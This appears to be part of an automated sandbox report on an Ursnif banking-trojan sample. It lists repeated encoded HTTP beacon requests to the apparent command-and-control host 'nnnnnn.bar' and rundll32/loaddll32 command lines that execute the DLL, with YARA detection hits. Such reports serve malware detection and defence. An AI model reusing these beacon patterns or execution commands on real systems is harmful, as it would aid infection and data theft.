Jan 21, 2022 07:55:59.956077099 CET	12411	OUT	GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:00.387495995 CET	12412	OUT	GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:00.903311968 CET	12413	OUT	GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:01.856380939 CET	12414	OUT	GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:03.747212887 CET	12415	OUT	GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:07.528678894 CET	12416	OUT	GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:15.077811956 CET	12417	OUT	GET /drew/7DgipjE3bmmbRPyMp6s7/BgNwib2SV4cWPRKen15/S3RnGOSvPDrV_2BWCH85t5/rAG3EMntvxQhd/z09P1P0N/JYWuQ1lZWbrjgAwzu9HwDiH/z_2BLAvnX1/8oE3_2BrbVuTg5XgN/fFGGve_2BZ6j/OLfiN5cTTiP/UJGuomraiJd058/bcTFQPP7iErfusSSsGsOL/4opclstIlc_2FqAf/jUg_2FZVQoG_2B4/nAlRxJiE1eByE2QqI0/X5WHEnb3X/D.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2022 07:56:00.402211905 CET	12412	OUT	GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:00.840862036 CET	12413	OUT	GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:01.387602091 CET	12414	OUT	GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:02.387679100 CET	12415	OUT	GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:04.387835979 CET	12416	OUT	GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:08.372697115 CET	12417	OUT	GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache
Jan 21, 2022 07:56:16.326375961 CET	12418	OUT	GET /drew/pgrqzdCpp_2BoR9YKjM/4PKdL3no8Cmh2eLar0r1e3/w1sLhdA1An4Ma/aD5fsj0e/RzdEMRLJALIuVpZbCXTm33B/7rNoIMP9VG/c8tgfuTkxT7ByPtRb/j_2BUePUN_2B/Bl7nkFpwFGb/eE5q1GPA2rANKR/WLm_2BrotZpp1pDZVWLMK/C4Hf3n12wJLU8uUR/lXrXiW51IsTlZ0K/b1wCGwV9dM41Za02jV/WmUTzni7Y/s2rU_2FN61u_2BQF/kOM.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: nnnnnn.bar Connection: Keep-Alive Cache-Control: no-cache

Start time:	07:52:08
Start date:	21/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\Wartless_v8.8.9.0.dll"
Imagebase:	0xbb0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.691343134.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350624974.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350468495.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.811066205.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350524992.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350610044.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350578118.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350596775.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350398147.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.350426132.00000000037A8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Start time:	07:52:09
Start date:	21/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\Wartless_v8.8.9.0.dll,DllRegisterServer
Imagebase:	0x300000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343910189.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.344026783.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high